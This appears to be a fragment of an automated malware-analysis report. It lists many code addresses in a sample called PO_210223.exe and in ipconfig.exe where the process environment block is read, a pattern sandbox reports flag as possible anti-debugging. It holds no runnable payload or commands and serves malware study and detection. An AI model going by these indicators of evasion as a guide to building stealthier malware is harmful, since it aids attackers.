Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01805210 mov eax, dword ptr fs:[00000030h]	9_2_01805210
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180AA16 mov eax, dword ptr fs:[00000030h]	9_2_0180AA16
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180AA16 mov eax, dword ptr fs:[00000030h]	9_2_0180AA16
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01823A1C mov eax, dword ptr fs:[00000030h]	9_2_01823A1C
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01844A2C mov eax, dword ptr fs:[00000030h]	9_2_01844A2C
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01844A2C mov eax, dword ptr fs:[00000030h]	9_2_01844A2C
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01809240 mov eax, dword ptr fs:[00000030h]	9_2_01809240
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01809240 mov eax, dword ptr fs:[00000030h]	9_2_01809240
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01809240 mov eax, dword ptr fs:[00000030h]	9_2_01809240
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01809240 mov eax, dword ptr fs:[00000030h]	9_2_01809240
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018CEA55 mov eax, dword ptr fs:[00000030h]	9_2_018CEA55
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01894257 mov eax, dword ptr fs:[00000030h]	9_2_01894257
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018BB260 mov eax, dword ptr fs:[00000030h]	9_2_018BB260
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018BB260 mov eax, dword ptr fs:[00000030h]	9_2_018BB260
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D8A62 mov eax, dword ptr fs:[00000030h]	9_2_018D8A62
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0184927A mov eax, dword ptr fs:[00000030h]	9_2_0184927A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01832581 mov eax, dword ptr fs:[00000030h]	9_2_01832581
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01832581 mov eax, dword ptr fs:[00000030h]	9_2_01832581
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01832581 mov eax, dword ptr fs:[00000030h]	9_2_01832581
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01832581 mov eax, dword ptr fs:[00000030h]	9_2_01832581
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01802D8A mov eax, dword ptr fs:[00000030h]	9_2_01802D8A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01802D8A mov eax, dword ptr fs:[00000030h]	9_2_01802D8A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01802D8A mov eax, dword ptr fs:[00000030h]	9_2_01802D8A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01802D8A mov eax, dword ptr fs:[00000030h]	9_2_01802D8A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01802D8A mov eax, dword ptr fs:[00000030h]	9_2_01802D8A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183FD9B mov eax, dword ptr fs:[00000030h]	9_2_0183FD9B
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183FD9B mov eax, dword ptr fs:[00000030h]	9_2_0183FD9B
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D05AC mov eax, dword ptr fs:[00000030h]	9_2_018D05AC
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D05AC mov eax, dword ptr fs:[00000030h]	9_2_018D05AC
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018335A1 mov eax, dword ptr fs:[00000030h]	9_2_018335A1
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01831DB5 mov eax, dword ptr fs:[00000030h]	9_2_01831DB5
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01831DB5 mov eax, dword ptr fs:[00000030h]	9_2_01831DB5
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01831DB5 mov eax, dword ptr fs:[00000030h]	9_2_01831DB5
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01886DC9 mov eax, dword ptr fs:[00000030h]	9_2_01886DC9
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01886DC9 mov eax, dword ptr fs:[00000030h]	9_2_01886DC9
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01886DC9 mov eax, dword ptr fs:[00000030h]	9_2_01886DC9
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01886DC9 mov ecx, dword ptr fs:[00000030h]	9_2_01886DC9
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01886DC9 mov eax, dword ptr fs:[00000030h]	9_2_01886DC9
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01886DC9 mov eax, dword ptr fs:[00000030h]	9_2_01886DC9
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0181D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0181D5E0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0181D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0181D5E0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018CFDE2 mov eax, dword ptr fs:[00000030h]	9_2_018CFDE2
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018CFDE2 mov eax, dword ptr fs:[00000030h]	9_2_018CFDE2
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018CFDE2 mov eax, dword ptr fs:[00000030h]	9_2_018CFDE2
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018CFDE2 mov eax, dword ptr fs:[00000030h]	9_2_018CFDE2
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018B8DF1 mov eax, dword ptr fs:[00000030h]	9_2_018B8DF1
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180AD30 mov eax, dword ptr fs:[00000030h]	9_2_0180AD30
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]	9_2_01813D34
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]	9_2_01813D34
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]	9_2_01813D34
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]	9_2_01813D34
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]	9_2_01813D34
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]	9_2_01813D34
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]	9_2_01813D34
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]	9_2_01813D34
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]	9_2_01813D34
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]	9_2_01813D34
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]	9_2_01813D34
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]	9_2_01813D34
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]	9_2_01813D34
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018CE539 mov eax, dword ptr fs:[00000030h]	9_2_018CE539
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01834D3B mov eax, dword ptr fs:[00000030h]	9_2_01834D3B
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01834D3B mov eax, dword ptr fs:[00000030h]	9_2_01834D3B
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01834D3B mov eax, dword ptr fs:[00000030h]	9_2_01834D3B
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D8D34 mov eax, dword ptr fs:[00000030h]	9_2_018D8D34
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0188A537 mov eax, dword ptr fs:[00000030h]	9_2_0188A537
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01843D43 mov eax, dword ptr fs:[00000030h]	9_2_01843D43
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01883540 mov eax, dword ptr fs:[00000030h]	9_2_01883540
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01827D50 mov eax, dword ptr fs:[00000030h]	9_2_01827D50
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0182C577 mov eax, dword ptr fs:[00000030h]	9_2_0182C577
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0182C577 mov eax, dword ptr fs:[00000030h]	9_2_0182C577
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0181849B mov eax, dword ptr fs:[00000030h]	9_2_0181849B
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D8CD6 mov eax, dword ptr fs:[00000030h]	9_2_018D8CD6
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C14FB mov eax, dword ptr fs:[00000030h]	9_2_018C14FB
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01886CF0 mov eax, dword ptr fs:[00000030h]	9_2_01886CF0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01886CF0 mov eax, dword ptr fs:[00000030h]	9_2_01886CF0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01886CF0 mov eax, dword ptr fs:[00000030h]	9_2_01886CF0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D740D mov eax, dword ptr fs:[00000030h]	9_2_018D740D
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D740D mov eax, dword ptr fs:[00000030h]	9_2_018D740D
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D740D mov eax, dword ptr fs:[00000030h]	9_2_018D740D
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01886C0A mov eax, dword ptr fs:[00000030h]	9_2_01886C0A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01886C0A mov eax, dword ptr fs:[00000030h]	9_2_01886C0A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01886C0A mov eax, dword ptr fs:[00000030h]	9_2_01886C0A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01886C0A mov eax, dword ptr fs:[00000030h]	9_2_01886C0A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]	9_2_018C1C06
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]	9_2_018C1C06
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]	9_2_018C1C06
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]	9_2_018C1C06
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]	9_2_018C1C06
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]	9_2_018C1C06
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]	9_2_018C1C06
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]	9_2_018C1C06
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]	9_2_018C1C06
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]	9_2_018C1C06
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]	9_2_018C1C06
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]	9_2_018C1C06
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]	9_2_018C1C06
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]	9_2_018C1C06
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183BC2C mov eax, dword ptr fs:[00000030h]	9_2_0183BC2C
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183A44B mov eax, dword ptr fs:[00000030h]	9_2_0183A44B
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0189C450 mov eax, dword ptr fs:[00000030h]	9_2_0189C450
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0189C450 mov eax, dword ptr fs:[00000030h]	9_2_0189C450
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0182746D mov eax, dword ptr fs:[00000030h]	9_2_0182746D
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01818794 mov eax, dword ptr fs:[00000030h]	9_2_01818794
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01887794 mov eax, dword ptr fs:[00000030h]	9_2_01887794
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01887794 mov eax, dword ptr fs:[00000030h]	9_2_01887794
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01887794 mov eax, dword ptr fs:[00000030h]	9_2_01887794
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018437F5 mov eax, dword ptr fs:[00000030h]	9_2_018437F5
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D070D mov eax, dword ptr fs:[00000030h]	9_2_018D070D
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D070D mov eax, dword ptr fs:[00000030h]	9_2_018D070D
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183A70E mov eax, dword ptr fs:[00000030h]	9_2_0183A70E
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183A70E mov eax, dword ptr fs:[00000030h]	9_2_0183A70E
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0182F716 mov eax, dword ptr fs:[00000030h]	9_2_0182F716
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0189FF10 mov eax, dword ptr fs:[00000030h]	9_2_0189FF10
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0189FF10 mov eax, dword ptr fs:[00000030h]	9_2_0189FF10
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01804F2E mov eax, dword ptr fs:[00000030h]	9_2_01804F2E
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01804F2E mov eax, dword ptr fs:[00000030h]	9_2_01804F2E
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183E730 mov eax, dword ptr fs:[00000030h]	9_2_0183E730
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0181EF40 mov eax, dword ptr fs:[00000030h]	9_2_0181EF40
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0181FF60 mov eax, dword ptr fs:[00000030h]	9_2_0181FF60
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D8F6A mov eax, dword ptr fs:[00000030h]	9_2_018D8F6A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0189FE87 mov eax, dword ptr fs:[00000030h]	9_2_0189FE87
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D0EA5 mov eax, dword ptr fs:[00000030h]	9_2_018D0EA5
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D0EA5 mov eax, dword ptr fs:[00000030h]	9_2_018D0EA5
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D0EA5 mov eax, dword ptr fs:[00000030h]	9_2_018D0EA5
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018846A7 mov eax, dword ptr fs:[00000030h]	9_2_018846A7
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01848EC7 mov eax, dword ptr fs:[00000030h]	9_2_01848EC7
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018BFEC0 mov eax, dword ptr fs:[00000030h]	9_2_018BFEC0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018336CC mov eax, dword ptr fs:[00000030h]	9_2_018336CC
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D8ED6 mov eax, dword ptr fs:[00000030h]	9_2_018D8ED6
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018316E0 mov ecx, dword ptr fs:[00000030h]	9_2_018316E0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018176E2 mov eax, dword ptr fs:[00000030h]	9_2_018176E2
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180C600 mov eax, dword ptr fs:[00000030h]	9_2_0180C600
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180C600 mov eax, dword ptr fs:[00000030h]	9_2_0180C600
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180C600 mov eax, dword ptr fs:[00000030h]	9_2_0180C600
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01838E00 mov eax, dword ptr fs:[00000030h]	9_2_01838E00
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1608 mov eax, dword ptr fs:[00000030h]	9_2_018C1608
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183A61C mov eax, dword ptr fs:[00000030h]	9_2_0183A61C
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183A61C mov eax, dword ptr fs:[00000030h]	9_2_0183A61C
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180E620 mov eax, dword ptr fs:[00000030h]	9_2_0180E620
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018BFE3F mov eax, dword ptr fs:[00000030h]	9_2_018BFE3F
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]	9_2_01817E41
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]	9_2_01817E41
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]	9_2_01817E41
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]	9_2_01817E41
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]	9_2_01817E41
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]	9_2_01817E41
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018CAE44 mov eax, dword ptr fs:[00000030h]	9_2_018CAE44
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018CAE44 mov eax, dword ptr fs:[00000030h]	9_2_018CAE44
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0181766D mov eax, dword ptr fs:[00000030h]	9_2_0181766D
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0182AE73 mov eax, dword ptr fs:[00000030h]	9_2_0182AE73
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0182AE73 mov eax, dword ptr fs:[00000030h]	9_2_0182AE73
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0182AE73 mov eax, dword ptr fs:[00000030h]	9_2_0182AE73
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0182AE73 mov eax, dword ptr fs:[00000030h]	9_2_0182AE73
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0182AE73 mov eax, dword ptr fs:[00000030h]	9_2_0182AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345DB40 mov eax, dword ptr fs:[00000030h]	13_2_0345DB40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346EF40 mov eax, dword ptr fs:[00000030h]	13_2_0346EF40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03528B58 mov eax, dword ptr fs:[00000030h]	13_2_03528B58
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345F358 mov eax, dword ptr fs:[00000030h]	13_2_0345F358
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345DB60 mov ecx, dword ptr fs:[00000030h]	13_2_0345DB60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346FF60 mov eax, dword ptr fs:[00000030h]	13_2_0346FF60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03483B7A mov eax, dword ptr fs:[00000030h]	13_2_03483B7A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03483B7A mov eax, dword ptr fs:[00000030h]	13_2_03483B7A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03528F6A mov eax, dword ptr fs:[00000030h]	13_2_03528F6A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348A70E mov eax, dword ptr fs:[00000030h]	13_2_0348A70E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348A70E mov eax, dword ptr fs:[00000030h]	13_2_0348A70E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0351131B mov eax, dword ptr fs:[00000030h]	13_2_0351131B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347F716 mov eax, dword ptr fs:[00000030h]	13_2_0347F716
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EFF10 mov eax, dword ptr fs:[00000030h]	13_2_034EFF10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EFF10 mov eax, dword ptr fs:[00000030h]	13_2_034EFF10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0352070D mov eax, dword ptr fs:[00000030h]	13_2_0352070D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0352070D mov eax, dword ptr fs:[00000030h]	13_2_0352070D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03454F2E mov eax, dword ptr fs:[00000030h]	13_2_03454F2E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03454F2E mov eax, dword ptr fs:[00000030h]	13_2_03454F2E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348E730 mov eax, dword ptr fs:[00000030h]	13_2_0348E730
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D53CA mov eax, dword ptr fs:[00000030h]	13_2_034D53CA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D53CA mov eax, dword ptr fs:[00000030h]	13_2_034D53CA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]	13_2_034803E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]	13_2_034803E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]	13_2_034803E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]	13_2_034803E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]	13_2_034803E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]	13_2_034803E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347DBE9 mov eax, dword ptr fs:[00000030h]	13_2_0347DBE9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034937F5 mov eax, dword ptr fs:[00000030h]	13_2_034937F5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03461B8F mov eax, dword ptr fs:[00000030h]	13_2_03461B8F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03461B8F mov eax, dword ptr fs:[00000030h]	13_2_03461B8F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0350D380 mov ecx, dword ptr fs:[00000030h]	13_2_0350D380
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03468794 mov eax, dword ptr fs:[00000030h]	13_2_03468794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348B390 mov eax, dword ptr fs:[00000030h]	13_2_0348B390
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D7794 mov eax, dword ptr fs:[00000030h]	13_2_034D7794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D7794 mov eax, dword ptr fs:[00000030h]	13_2_034D7794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D7794 mov eax, dword ptr fs:[00000030h]	13_2_034D7794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0351138A mov eax, dword ptr fs:[00000030h]	13_2_0351138A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482397 mov eax, dword ptr fs:[00000030h]	13_2_03482397
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03484BAD mov eax, dword ptr fs:[00000030h]	13_2_03484BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03484BAD mov eax, dword ptr fs:[00000030h]	13_2_03484BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03484BAD mov eax, dword ptr fs:[00000030h]	13_2_03484BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03525BA5 mov eax, dword ptr fs:[00000030h]	13_2_03525BA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03459240 mov eax, dword ptr fs:[00000030h]	13_2_03459240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03459240 mov eax, dword ptr fs:[00000030h]	13_2_03459240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03459240 mov eax, dword ptr fs:[00000030h]	13_2_03459240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03459240 mov eax, dword ptr fs:[00000030h]	13_2_03459240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]	13_2_03467E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]	13_2_03467E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]	13_2_03467E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]	13_2_03467E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]	13_2_03467E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]	13_2_03467E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034E4257 mov eax, dword ptr fs:[00000030h]	13_2_034E4257
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346766D mov eax, dword ptr fs:[00000030h]	13_2_0346766D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0350B260 mov eax, dword ptr fs:[00000030h]	13_2_0350B260
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0350B260 mov eax, dword ptr fs:[00000030h]	13_2_0350B260
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03528A62 mov eax, dword ptr fs:[00000030h]	13_2_03528A62
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0349927A mov eax, dword ptr fs:[00000030h]	13_2_0349927A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347AE73 mov eax, dword ptr fs:[00000030h]	13_2_0347AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347AE73 mov eax, dword ptr fs:[00000030h]	13_2_0347AE73
